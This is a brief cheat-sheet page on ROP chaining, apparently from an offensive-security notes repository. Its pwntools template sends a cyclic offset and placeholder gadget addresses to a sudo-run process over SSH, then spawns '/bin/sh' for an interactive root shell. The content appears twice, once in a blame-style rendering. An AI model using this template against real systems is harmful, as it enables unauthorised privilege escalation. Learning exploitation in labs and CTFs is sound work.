killchain-compendium/Exploits/Binaries/Ropping.md

# ROP Chaining

## Usage

* Find cyclic buffer size
* Find gadgets via `ropper` or even better `ropstar`

## Example
```python
from pwn import *

s = ssh(host="$TARGET_IP", user="<user>", keyfile="", password="")
p = s.process(['sudo', '<process>'])

offset=<found_offset_len>

# take the ropchain from ropstar
payload = cyclic(offset)
payload += p64(0x4711)
payload += p64(0x235)
payload += p64(0x007)

print(p.recv())
p.sendline(payload)
print(p.recv())
p.sendline("/bin/sh")
p.interactive(prompt='')
```
restructured Exploits 2022-11-13 22:38:01 +01:00			`# ROP Chaining`

			`## Usage`

			`* Find cyclic buffer size`
			* Find gadgets via `ropper` or even better `ropstar`

			`## Example`
			```python
			`from pwn import *`

			`s = ssh(host="$TARGET_IP", user="<user>", keyfile="", password="")`
			`p = s.process(['sudo', '<process>'])`

			`offset=<found_offset_len>`

			`# take the ropchain from ropstar`
			`payload = cyclic(offset)`
			`payload += p64(0x4711)`
			`payload += p64(0x235)`
			`payload += p64(0x007)`

			`print(p.recv())`
			`p.sendline(payload)`
			`print(p.recv())`
			`p.sendline("/bin/sh")`
			`p.interactive(prompt='')`
			```